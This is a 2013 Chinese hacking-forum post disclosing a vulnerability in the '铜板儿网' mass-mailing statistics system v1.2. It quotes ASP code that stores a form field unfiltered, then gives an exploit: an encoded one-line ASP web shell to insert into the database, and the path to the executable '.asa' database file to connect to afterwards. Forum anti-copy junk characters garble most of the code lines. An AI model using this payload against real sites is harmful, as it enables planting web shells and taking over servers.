找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2284|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp 8 A$ ?7 N9 P" c- X$ r
4 w- ^8 w: u1 g8 }  o
IF Request.QueryString("Action")="del" Then
. {7 z0 o1 L5 Y9 hID=Request.QueryString("ID") ! X. p$ Q  K- F& F
IF Countss ("tui","Fenlei",ID )<>0 then
* Y* H, M- X% y8 w& }; ?'略
. I4 d: ~3 z- ~. b  f' i# a1 @IF Request.QueryString("Action")="Add" Then % \0 Q4 v3 |2 |) x
Tname=Request.Form("Typename") ! _9 ^: F  \  |* n& |7 A
Set Rs=Server.CreateObject("adodb.Recordset")
$ _% m4 I. q* mSql="Select * From Fenlei Order by id Desc " 0 H- }. k6 a- H0 {/ S  D
Rs.Open Sql,Conn,1,3 ( z3 Y/ Y' U  ]- J# T, W
Rs.Addnew   T$ l# K# X! ^: e6 O+ ~' {
Rs("Typename")=Tname
$ O" V& d, b' ?$ |9 U7 h6 T" ~'略 8 o  G- O6 o* e
Set Rs=Server.CreateObject("adodb.Recordset") 0 B+ y- k0 C+ a7 H1 M9 E+ i" T# L
Sql="Select * From Fenlei Order by id Desc " 4 j! [% q4 S* c, p
Rs.Open Sql,Conn,1,1
3 ~9 {( m7 \+ {% @" \: O2 ]'略
% S% z- D: F0 Z. g8 C4 u%>! t* L' _  O) q

8 N5 T' C6 ^: m# i
0 \, O. Y3 {7 @! }4 Y5 Z  b; A - ?2 q. D: M2 a* p: W
没有过滤,直接写入数据库。
' w% k( l1 Z  Z# S. ]2 f9 o
5 p; D/ y" j% p( a利用方法:
4 C2 D8 t* ^6 G# @. N9 f/ E ' K8 r. Q$ k! m8 n
插入:┼攠數畣整爠煥敵瑳∨≡┩>
  j' x2 ?4 ^' f8 X1 U4 S7 L # r7 C" O8 \8 A! N3 q- V8 U( {; w
+ `8 E. ]* D% Z0 P- J6 V0 N% O
连接: http://www.xxx.com/###tongbaner.asa
  G; K) T7 z7 ^' n4 _5 z'默认安装文件: / |6 B2 U: A2 `9 |
'install.asp
! Y1 `  w4 c8 S8 j5 K" L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表